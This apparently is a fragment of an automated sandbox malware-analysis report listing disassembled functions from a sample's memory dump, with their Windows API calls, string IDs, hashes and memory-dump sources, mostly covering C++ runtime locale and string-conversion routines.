                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,003EC6DF,?,00000001,00000000,?,00000000,?,003EC6DF,?), ref: 00406F6C
                                                                      • __alloca_probe_16.LIBCMT ref: 00406F98
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,003EC6DF,?,?,00000000,003ECCD3,0000003F,?), ref: 00406FD7
                                                                      • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,003EC6DF,?,?,00000000,003ECCD3,0000003F), ref: 00406FF4
                                                                      • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,003EC6DF,?,?,00000000,003ECCD3,0000003F), ref: 00407033
                                                                      • __alloca_probe_16.LIBCMT ref: 00407050
                                                                      • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,003EC6DF,?,?,00000000,003ECCD3,0000003F), ref: 00407092
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,003EC6DF,?,?,00000000,003ECCD3,0000003F,?), ref: 004070B5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                      • String ID:
                                                                      • API String ID: 2040435927-0
                                                                      • Opcode ID: c8fbcf4db159e48b433209c622e118790e8c7c35654905d4dbb85babb603de17
                                                                      • Instruction ID: cee535d5545fb007cc633f89e8e916bbb341e9a2db57e39dd6c618e1c6a6e5b7
                                                                      • Opcode Fuzzy Hash: c8fbcf4db159e48b433209c622e118790e8c7c35654905d4dbb85babb603de17
                                                                      • Instruction Fuzzy Hash: 9F51D372A0020AABDF209F50DC45FAB7BA9EF04754F11413AF905B62D0DB39AD11CB5A
                                                                      Function 003E5940 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 389fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTempFileNameW.KERNEL32(?,URL,00000000,?,755CD0F6,?,00000004), ref: 003E59AA
                                                                      • LocalFree.KERNEL32(?), ref: 003E5ABB
                                                                      • MoveFileW.KERNEL32(?,00000000), ref: 003E5D5B
                                                                      • DeleteFileW.KERNEL32(?), ref: 003E5DA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: File$DeleteFreeLocalMoveNameTemp
                                                                      • String ID: URL$url
                                                                      • API String ID: 1622375482-346267919
                                                                      • Opcode ID: 2aa68a737cd3df0b638f6e3255a1d4a4b9816e4de8403a83febc5d8ee45b0b71
                                                                      • Instruction ID: 57ad3e989a1852d8cb52e734bb7d2b1059ed2e00416fbead6c8873573047aab7
                                                                      • Opcode Fuzzy Hash: 2aa68a737cd3df0b638f6e3255a1d4a4b9816e4de8403a83febc5d8ee45b0b71
                                                                      • Instruction Fuzzy Hash: 1C027870E146A9DACB25DF29CD98B9DB7B5BF54304F2042D9D009A7291EB74ABC4CF80
                                                                      Function 003EF5E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 189memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,0000000C,755CD0F6,?,00000000,00000000,?,?,?,?,00000000,0042B2D1,000000FF,?,003EEBCA,00000000), ref: 003EF624
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EF65A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EF6BE
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003EF77E
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EF832
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2968629171-1405518554
                                                                      • Opcode ID: c2f15131e0734358469337ab1c1544624d42c0e0cf9376927d22257d03faee8c
                                                                      • Instruction ID: 96cac2ec43c54a82ccd061855199484dd30e0f496e01de061d02bcba33d08579
                                                                      • Opcode Fuzzy Hash: c2f15131e0734358469337ab1c1544624d42c0e0cf9376927d22257d03faee8c
                                                                      • Instruction Fuzzy Hash: 927170B0D01298DEEF11CFA9C98479EBBB4AF15354F1442A9E414BB281D7B99A04C7A1
                                                                      Function 003EF3B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000008,755CD0F6,?,00000000,00000000,?,?,?,00000000,0042B1DD,000000FF,?,003EED0A,00000000,?), ref: 003EF3F4
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EF42A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EF48E
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003EF4FE
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EF5B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2968629171-1405518554
                                                                      • Opcode ID: b041fdacbffd99fe994aad338b4863115b61fd66bdc6d1bc72a42866b98a68ca
                                                                      • Instruction ID: df03f38a6e963c9ac58ba19fa027bbd8e895b7bab526df5c9e985c8026fa4936
                                                                      • Opcode Fuzzy Hash: b041fdacbffd99fe994aad338b4863115b61fd66bdc6d1bc72a42866b98a68ca
                                                                      • Instruction Fuzzy Hash: 2A618FB0D01398EEEB11CFE9D94479EBBB4AF25304F1442ADE454AB2C1D7B99A04CB61
                                                                      Function 00408D30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00408D67
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00408D6F
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00408DF8
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00408E23
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00408E78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: 0f220d9709b388b34d06e97222732ee10bf9d9086453f8f5a89107f2e669985b
                                                                      • Instruction ID: 33073348539d85ee9ee7ad7dfb5bb215549edd7996daaea7737c53f4e773c470
                                                                      • Opcode Fuzzy Hash: 0f220d9709b388b34d06e97222732ee10bf9d9086453f8f5a89107f2e669985b
                                                                      • Instruction Fuzzy Hash: 8C41A434A002199BCF10DF69C844A9FBBB6EF44314F14856AE954AB3D3DB399A01CBD9
                                                                      Function 0041C96B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(00000000,?,0041CA78,?,?,?,00000000,?,?,0041CCA2,00000021,FlsSetValue,00431E00,00431E08,?), ref: 0041CA2C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3664257935-537541572
                                                                      • Opcode ID: e194776b3fb196894752ef3fc5b8e990afe362e177e9942e28dc563026e629af
                                                                      • Instruction ID: 7f3c78a490ce6ca87a57760621c14f825eb8c9bd81b726ff71fc4ab30b3dfb53
                                                                      • Opcode Fuzzy Hash: e194776b3fb196894752ef3fc5b8e990afe362e177e9942e28dc563026e629af
                                                                      • Instruction Fuzzy Hash: C9212E71A81215A7CB22DB65AC84BEB37689F417E4F240132E805E7390E738ED41C6DC
                                                                      Function 003F2823 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F282A
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F2834
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • numpunct.LIBCPMT ref: 003F286E
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F2885
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F28A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                      • String ID: tHD
                                                                      • API String ID: 743221004-3853015322
                                                                      • Opcode ID: 5bc2fe6dccbd38b68053b1ebe9fb28c8122c232bc03d74de087a1ae7714e2a9a
                                                                      • Instruction ID: 118883105096b28c7ff924d567907444d4cc14f92f81dd6d6f7c3a0e181063b2
                                                                      • Opcode Fuzzy Hash: 5bc2fe6dccbd38b68053b1ebe9fb28c8122c232bc03d74de087a1ae7714e2a9a
                                                                      • Instruction Fuzzy Hash: FE110E3590061DDBCF06EB60C8526BE77A1AF90710F29011DE610AB3C2DF349E018B80
                                                                      Function 003F8030 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F8037
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F8041
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • numpunct.LIBCPMT ref: 003F807B
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F8092
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F80B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                      • String ID: ID
                                                                      • API String ID: 743221004-3023824217
                                                                      • Opcode ID: 53147377278bd008540b01e6bb18ceb120b5caa00c1ce2b73a4ba1f4169068f9
                                                                      • Instruction ID: 45410e0f21bf8fc1798f568efcdba5d963cc8e3dbd50a1359f42fa5c84750788
                                                                      • Opcode Fuzzy Hash: 53147377278bd008540b01e6bb18ceb120b5caa00c1ce2b73a4ba1f4169068f9
                                                                      • Instruction Fuzzy Hash: 9B01D27690062EDBCF06EBA4C8457BEB761AF84310F65411AE610AF3D2DF349E05CB84
                                                                      Function 003F2664 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F266B
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F2675
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • codecvt.LIBCPMT ref: 003F26AF
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F26C6
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F26E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                      • String ID: xHD
                                                                      • API String ID: 712880209-3971129470
                                                                      • Opcode ID: 95b1b8bace149b8ce051ba1fa2798d4f9e9ec47ba46ff9735c4a3e9b0c7ae2b0
                                                                      • Instruction ID: 380247fa739b3800dbaa8d6975bd343e613d74885200e1987865c8dfece4a3f9
                                                                      • Opcode Fuzzy Hash: 95b1b8bace149b8ce051ba1fa2798d4f9e9ec47ba46ff9735c4a3e9b0c7ae2b0
                                                                      • Instruction Fuzzy Hash: 4901D235900A6DDBCF06EB64CC456BEB7A5AF85320F25011AE610AF2D2DF789E018B84
                                                                      Function 003F76E0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F76E7
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F76F1
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • collate.LIBCPMT ref: 003F772B
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7742
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7762
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                      • String ID: ID
                                                                      • API String ID: 1007100420-3023824217
                                                                      • Opcode ID: 32b4815dabdb05183d247c79f7c2ea14bb69a11f307cb25bd78060e20558064e
                                                                      • Instruction ID: 9725985a5328ecf46934bf106f18d6c8311734820e749bd8bc6c4a53674afa3e
                                                                      • Opcode Fuzzy Hash: 32b4815dabdb05183d247c79f7c2ea14bb69a11f307cb25bd78060e20558064e
                                                                      • Instruction Fuzzy Hash: 65012E3590462D8BCF02FBA4D8026BEB7A1AF84310F28011AE610AF3D2CF349E05CBC4
                                                                      Function 004038C1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 004038C8
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004038D2
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • collate.LIBCPMT ref: 0040390C
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403923
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403943
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                      • String ID: dJD
                                                                      • API String ID: 1007100420-3417872616
                                                                      • Opcode ID: 62ce093ec956f61fc727538c566e5ec4c176cccbf4535796c9ce82984451213a
                                                                      • Instruction ID: fc58bddcc8f1fcbb19c0eaac6235713c91910dd890462d983ed32940bee7712d
                                                                      • Opcode Fuzzy Hash: 62ce093ec956f61fc727538c566e5ec4c176cccbf4535796c9ce82984451213a
                                                                      • Instruction Fuzzy Hash: 0801DB759006198BCF02EF64C8056BEBB65AF84310F14012AE6107F3D1DF789F0187C8
                                                                      Function 00403956 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 0040395D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403967
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • messages.LIBCPMT ref: 004039A1
                                                                      • std::_Facet_Register.LIBCPMT ref: 004039B8
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004039D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                      • String ID: hJD
                                                                      • API String ID: 2750803064-3265421708
                                                                      • Opcode ID: 2988cc019a512e40448b02679d597d3c03253fe718702244b8c86adea2bf6330
                                                                      • Instruction ID: 3696d5e8e8902df67a419d909fb2b7176d94ad99244c2599f53f7ca5604e7ecd
                                                                      • Opcode Fuzzy Hash: 2988cc019a512e40448b02679d597d3c03253fe718702244b8c86adea2bf6330
                                                                      • Instruction Fuzzy Hash: 9C01C4759006199BCB02EF64C8466BE7B69AF85320F25452EE5107B3D2DF789E01C789
                                                                      Function 00403B15 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00403B1C
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403B26
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 00403B60
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403B77
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403B97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID: xJD
                                                                      • API String ID: 419941038-3733242620
                                                                      • Opcode ID: 4a31b67cf8beea4c3594614c0f6407959d36c7b19ebce86f22daa9c24cd59456
                                                                      • Instruction ID: fab2fc4a840a6ec8f819bb17a945e2220d73bb95030a9c4200428b21420eb323
                                                                      • Opcode Fuzzy Hash: 4a31b67cf8beea4c3594614c0f6407959d36c7b19ebce86f22daa9c24cd59456
                                                                      • Instruction Fuzzy Hash: 6701A575900619DBCB02EFA5C8456BEBB75AF84314F24052EE5147B3D2CF389A018B89
                                                                      Function 00403BAA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00403BB1
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403BBB
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 00403BF5
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403C0C
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403C2C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID: tJD
                                                                      • API String ID: 419941038-3617471384
                                                                      • Opcode ID: 0b8d17614312491b71f7034be47276418b15db1cb69588af7e964e3b54b54e8b
                                                                      • Instruction ID: 9a9e93d997c42724fefc49b653d837a24c478082552533e0906d0c8351a78df8
                                                                      • Opcode Fuzzy Hash: 0b8d17614312491b71f7034be47276418b15db1cb69588af7e964e3b54b54e8b
                                                                      • Instruction Fuzzy Hash: 3E01C875904629DBDB12EFA4C9066BE7B65AF84310F14052AE510BB3D2CF789E018788
                                                                      Function 003E6C20 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 183memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,40000022,755CD0F6,?,00000000,?,?,?,?,00429DA0,000000FF,?,003E6432,00000000,?), ref: 003E6CC4
                                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,755CD0F6,?,00000000,?,?,?,?,00429DA0,000000FF,?,003E6432,00000000,?), ref: 003E6CE7
